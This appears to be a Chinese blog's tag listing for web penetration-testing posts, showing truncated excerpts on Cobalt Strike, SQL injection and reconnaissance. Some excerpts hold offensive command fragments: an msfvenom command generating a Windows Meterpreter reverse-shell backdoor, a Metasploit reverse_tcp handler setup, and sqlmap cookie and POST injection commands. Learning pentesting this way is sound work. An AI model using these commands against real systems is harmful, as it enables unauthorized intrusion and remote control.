标签：web渗透

2020-07-27hush阅读(588)赞(0)

事情缘起 杜兄弟在某旅游集团公司任职 IT 技术主管，有两家驻场安全厂商为其提供安全服务，一家负责业务相关的渗透测试，一家负责网络访问、流量监测的安全管控，上周和他吃了个串串，整个饭局除了刚开始的寒喧，大部份时间就是布道，在他的管理下，生产...

2020-07-20hush阅读(785)赞(0)

与Metasploit联动 Cobalt Strike → Metasploit msf开启监听模式 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp...

2020-07-19hush阅读(776)赞(0)

0x00 简介 Cobalt Strike是一款基于java的渗透测试神器，常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用，分为客户端与服务端，服务端是一个，客户端可以有多个，非常适合团队协...

2020-06-30hush阅读(1481)赞(0)

文章为信息收集和端口渗透两部分，21端口为ftp版本漏洞 8080端口为CMS的渗透 信息收集： ·使用扫描工具nmap ,PortScan 对整个网段进行扫描 信息：通过访问网站得到要测试的IP为192.168.31.69 该IP的中间件...

2020-02-23hush阅读(778)赞(0)

1.floor函数 学习中遇见了 select count() from table group by floor(rand(0)2); 这么条语句。秉持着不求甚解的态度，在此做个总结。首先，只要该语句明白了，那么类似 select cou...

2019-12-16hush阅读(812)赞(0)

1.系统的信息收集 1.1.CDN 什么是CND？ 内容分发式服务 CDN的优势？ 隐藏源主机ip，降低延迟，提高服务响应速度，增加网络冗余，减小主机服务器压力。 1.2真实ip查询 1判断目标是否使用了CDN 利用在线网站 http://...

2019-12-14hush阅读(880)赞(0)

方法：

2019-12-10hush阅读(1028)赞(0)

0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马： msfvenom -p windows/meterpreter/reverse_tcp lhost...

2019-12-10hush阅读(928)赞(0)

cookie注入：sqlmap.py -u 注入点 –cookie “参数” –tables –level 2 POST登录框注入：sqlmap.py -r 从文件读取数据 -p ...